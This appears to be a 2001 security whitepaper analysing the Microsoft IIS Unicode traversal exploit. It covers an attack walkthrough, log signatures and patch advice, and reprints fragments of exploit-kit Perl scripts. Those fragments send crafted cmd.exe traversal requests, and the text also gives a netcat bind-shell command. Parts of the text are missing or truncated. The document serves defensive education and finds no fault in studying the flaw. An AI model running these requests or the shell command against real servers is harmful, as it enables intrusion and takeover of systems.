Microsoft IIS Unicode Exploit: by Nate Miller Member of Consulting Staff Lucent Technologies Worldwide Services
Microsoft IIS Unicode Exploit: by Nate Miller Member of Consulting Staff Lucent Technologies Worldwide Services
Microsoft IIS Unicode Exploit: by Nate Miller Member of Consulting Staff Lucent Technologies Worldwide Services
Unicode Exploit
By Nate Miller
Unicode attempts to be a comprehensive solution for electronically mapping all the characters of
the world's languages, allowing a theoretical total of over 65,000 characters in its 16-bit character
definition. There have been two independent attempts to create a single, unified character set.
One was the ISO 10646 project of the International Organization for Standardization (ISO); the
other was the Unicode Project organized by a consortium of manufacturers of multi-lingual
software. They eventually joined efforts to create a single code table.
Unicode extensions are installed by default with Microsoft Internet Information Server (IIS)
versions 4.0 and 5.0. This is to allow characters that are not used in the English Language to be
recognized by web servers. The IIS Unicode Exploit allows users to run arbitrary commands on
the web server. IIS servers with the Unicode extensions loaded are vulnerable unless they are
running current patches. This paper will explain in detail how this seemingly harmless service can
lead to a system compromise, and what can be done to minimize that vulnerability.
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Because the exploit uses http, it can be made to work right from the Address bar of a browser.
This is in fact the easiest way to exploit the vulnerability, but scripting the attack makes it more
efficient and powerful.
The following example (Figure 1) shows a non-destructive command being run from the browser
Address bar, which displays the directory listing of the c:\ directory of a web server. Because of
the non-interactive nature of this exploit, interactive commands such as ftp and telnet don’t work
very well. We will see later how it is possible to run commands interactively using this exploit as a
first step.
This is a simple example of the Unicode Exploit using a web browser. Note that the output of the
command dir c:\ is displayed in the browser window.
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To understand the actual attack, one must closely examine a sample of the exploit. The following
URL was run on a vulnerable machine on the Internet. The URL will run the command dir c:\
and return the output as a web page. Let’s examine the URL: (the IP address has been modified
to protect server identity)
Moving from left to right, the first thing we notice is that the URL calls something from the
/scripts directory on the server For this particular version of the attack, the
scripts directory (or another directory which has execute permissions such as cgi-bin) must exist
and the path to the executable cmd.exe must be correct.
The next thing we see is ..%c0%af. The string of characters “%c0%af” is an overlong Unicode
representation for '/'. If the Unicode extension is loaded on the server, the URL will be
interpreted to be:
Analyzing the URL in this form makes it a little more obvious what is going on here. This is
exactly like the old Dot Dot attack. The URL backs out of the web root, to the root directory of
the server, then calls \winnt\system32\cmd.exe with the parameters dir and C:\. We are using the
command interpreter (cmd.exe) to execute the command “dir c:\”. The resulting directory listing
is displayed in Figure 1.
Any command that can be executed by the user IUSR_machinename can be run by crafting the
appropriate URL and entering it into the address bar. The IUSR_machinename user has
approximately the same rights as a normal user who logs on interactively at the console. It is
important to note that this exploit does not give the attacker Administrative level access unless the
server has been mis-configured and runs as an Administrative user. There are, however, ways
that attackers can elevate their access to Administratuve level, using this exploit as a first step.
Other vulnerabilities would have to be exploited in order to gain administrative access, but once
attackers have any level of access to the Operating System, it is usually relatively easy for them to
gain administrative privileges.
The exploit works because of how, and more importantly when, an unpatched IIS server interprets
the Unicode characters. It seems that IIS interprets Unicode characters after it does path
checking. We see that substituting a / for the %c0%af will result in a “404” error on the web
server. We can deduce from this output that IIS checks the path before interpreting the Unicode
Microsoft IIS Unicode Exploit August 2001 Lucent Technologies Worlwide Services - 4 -
Figure 2: 404 Error
The following diagram illustrates how an attack might happen. The attack is an example of what
a typical attacker might do once a vulnerable server is discovered. The diagram illustrates an
attacker causing the victim server to download a file via TFTP, and then executing the file.
Microsoft IIS Unicode Exploit August 2001 Lucent Technologies Worlwide Services - 5 -
1 2
1. From a web browser, the attacker determines that the Web Server running on is
vulnerable to the Unicode Exploit. Once this is determined, attackers will typically try to elevate their
privileges. This can be done easily by downloading other malicious code or a trojan horse program
from another location using tftp.
2. Attackers craft a URL that causes the web server to use tftp to download a file from the server
3. The TFTP server sends the trojan program to the web server.
4. Attackers then execute the program remotely, agian using the web browser and the Unicode
exploit to run the command.
5. Attackers now have full control over the web server using the trojan program.
Microsoft IIS Unicode Exploit August 2001 Lucent Technologies Worlwide Services - 6 -"-
Once the file Trojan.exe resides on the server, the attacker can then execute the Trojan with the
If the file Trojan.exe were Netbus or Back Orifice, the server would then be infected and
completely vulnerable. These Trojans do not require a high level of access to be installed, but give
the Trojan user complete control over the infected system.
This script was chosen because of its particularly good documentation and completeness. This zip
file contains everything you need to exploit a vulnerable IIS server. The zip archive contains the
Perl scripts to test if a server is vulnerable, a Trojan program that will open a backdoor on the
compromised server, and a TFTP server for you to run on your local box.
The first step in this type of exploit is to determine vulnerable servers. This particular exploit
program has a Perl script that can determine if hosts are vulnerabl;, the script is called A
user would scan a range of IP addresses using this or a similar tool to determine quickly which
servers are vulnerable to this exploit.
The second step is to then make the target server download a precompiled executable file called
ncx99.exe. This exploit provides a TFTP server that runs on Windows platforms, and detailed
instructions for setting up the server so that remote TFTP clients can download the file. The
attacker would then use another Perl script,, to cause the server to download the file
from a TFTP server.
The final step in the exploit is to execute the file that you just uploaded to the vulnerable server.
This can also be done using the script. The Perl code for and can be
found in the Source Code/Pseudo Code section.
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Once the ncx99.exe file has been executed on the target server, the attacker can then use telnet
or netcat to connect directly to port 99 with no authentication. This gives direct command-line
access to the target machine that is not logged via the IIS logs. The ncx99.exe executable acts
like a telnet server running on port 99. The executable is probably nothing more than a modified
netcat that needs no switches or options. Using the standard netcat executable with the following
options would do the same thing:
nc -l -p 99 -t -e cmd.exe
This command tells netcat to listen to port 99 and when it receives a connection, run cmd.exe.
This effectively opens a telnet server on port 99 that requires no authentication. Once an attacker
has command-line access to the machine, the attacker can download other code, such as
getadmin.exe or other similar privilege-elevating code to gain administrative-level access. There
are several binaries available on the Internet that will add a particular user to the administrators
group, or allow any user to execute commands with administrative-level privileges. Many of these
exploits will work well on a Windows 2000 SP1 machine and use the named pipe vulnerability.
There are, of course, many other things malicious attackers might do once they get access to the
server. The three most likely targets are data integrity, availability, and confidentiality. Once this
attack has compromised a system, it is very difficult to ensure data integrity. Attackers often
leave back doors into systems they have compromised to facilitate their return later. Attackers
often delete logs and turn off auditing to cover their tracks. There are many ways to compromise
a system’s integrity, but very few ways to know for sure what an attacker has done to a system
after initial compromise.
At the time of this writing, many people are exploiting this vulnerability and using it to do one of
two things. Hosts that have been exploited using this vulnerability are often used to scan and
attack for other vulnerable hosts. By hopping through many compromised hosts before launching
an attack, the attacker makes it more difficult to detect the true source address. This vulnerability
has also been incorporated into a new worm that affects both Microsoft IIS and Solaris platforms.
The other common use of exploited hosts is as a “zombie” for use in denial of service attacks.
Because of the large number of vulnerable hosts, attackers have used compromised hosts to build
a flood network.
Attack Signature
Because we are using the web server to perform commands, odd-looking URL requests will show
up in the IIS logs (assuming that the web server is logging accesses). The exploit will generate
entries in the log similar to the following:
2001-01-11 18:59:13 - 80 GET /scripts/../../winnt/system32/cmd.exe
/c+dir+c:\ 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+NT+5.0)
2001-01-11 18:59:57 - 80 GET /scripts/../../winnt/system32/cmd.exe
/c+dir+c:%5C 200 Mozilla/4.74+[en]+(Windows+NT+5.0;+U)
2001-01-11 19:00:23 - 80 GET /scripts/../../winnt/system32/cmd.exe
/c+dir+c:\ 200 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2001-01-11 19:39:46 - 80 GET /scripts/../../winnt/system32/cmd.exe
/c+dir+c:\ 200 Mozilla/4.0+(compatible;
Microsoft IIS Unicode Exploit August 2001 Lucent Technologies Worlwide Services - 8 -
Identifying what the attacker is doing (or trying to do) is quite obvious from the URL in the logs.
Note that the logs do not print out the Unicode representation of the slash, but the Interpreted
Unicode ( / ). This may confuse someone who tries to paste this into his or her browser because
it generates a “404” error. This may give the person a false sense of confidence that a system
has not been compromised, when in fact, it has. Note that the server would return a code 200,
which indicates that the GET command was processed successfully. This indicates that the
server fulfilled the request and that the system has been compromised.
The best way to tell if your server has been compromised is to keep a close eye on the logs.
There is no telltale log entry that will tell you if you have been compromised or scanned for this
vulnerability because of the wide range of possibilities of compromise. However, if any log entries
contain “exe” or the telltale “slashes” accompanied by a server code 200, the system should be
investigated immediately to determine the likelihood and the severity of the compromise.
It is also very important to look for any large time gaps when there are no log entries, because this
also a sure sign that log entries have been deleted. Attackers will try to cover their tracks to keep
from being detected, especially if it is easy to tell where the attack originated. This is a good
reason to have logs in two separate places for any server that is accessible to the Internet.
IIS 4.0
IIS 5.0
The Unicode vulnerability affects many IIS 4.0 and 5.0 web servers, and is currently the most
common attack used to compromise IIS web servers. Because of the relative ease of carrying
out this attack, Microsoft IIS Servers (which comprise less than one-third of Internet web servers)
now make up about two-thirds of the total number of compromised web servers according to
Microsoft IIS Unicode Exploit August 2001 Lucent Technologies Worlwide Services - 9 - Simply maintaining current patch levels could prevent nearly all system
Microsoft IIS Unicode Exploit August 2001 Lucent Technologies Worlwide Services - 10 -
The following scripts are Perl scripts contained in the NIT_Unicode exploit kit mentioned above.
# Use this perl script to identify if the host is vulnerable!
# Usage: perl IP:port
# Only makes use of "Socket" library
# This does 14 different checks. Have Fun!
use Socket;
# --------------init
if ($#ARGV<0) {die "UNICODE-CHECK
# ---------------test method 2
my @results=sendraw("GET
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
# ---------------test method 3
my @results=sendraw("GET
/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 4
my @results=sendraw("GET
/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 5
my @results=sendraw("GET
/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 6
my @results=sendraw("GET
/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 7
my @results=sendraw("GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 8
my @results=sendraw("GET
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 10
my @results=sendraw("GET
/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 11
my @results=sendraw("GET
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 12
my @results=sendraw("GET
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 13
my @results=sendraw("GET
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# ---------------test method 14
my @results=sendraw("GET
/cmd.exe\?/c\+dir HTTP/1.0\r\n\r\n");
foreach $line (@results){
if ($line =~ /Directory/) {$flag=1;}}
# This is for educational purpose's only!
# Use first to see if this is a vulnerable server!
# Based of the script from Roelof Temmngh
use Socket;
$command=~s/ /\%20/g;
my @results=sendraw("GET
print @results;
# No comments.
# -- Xphere --
use Socket;
$SIG{'ALRM'} = sub { exit(0) };
$SIG{'CHLD'} = sub { wait };
if ($#ARGV == 1) {
$in = $ARGV[0];
$out = $ARGV[1];
} else {
print "\n\e[0;34m[ MDAC scanner by: Xphere --
print "Usage: $0 <host_list> <log_file> &\n";
while (<IN>) {
chomp($line = $_);
if ($line =~ /(\S*)/) {
if ($pid = fork) {
sleep 10;
} elsif (defined($pid)) {
sub checkh
my ($server) = @_;
my ($port) = 80;
chop($hostname = 'hostname');
while (<S>) {
chomp($serv = $_);
if ($serv =~ /^HTTP\/1\.1\s200\sOK/i) {
print OUT "$server runs MDAC.\n"
sleep 15;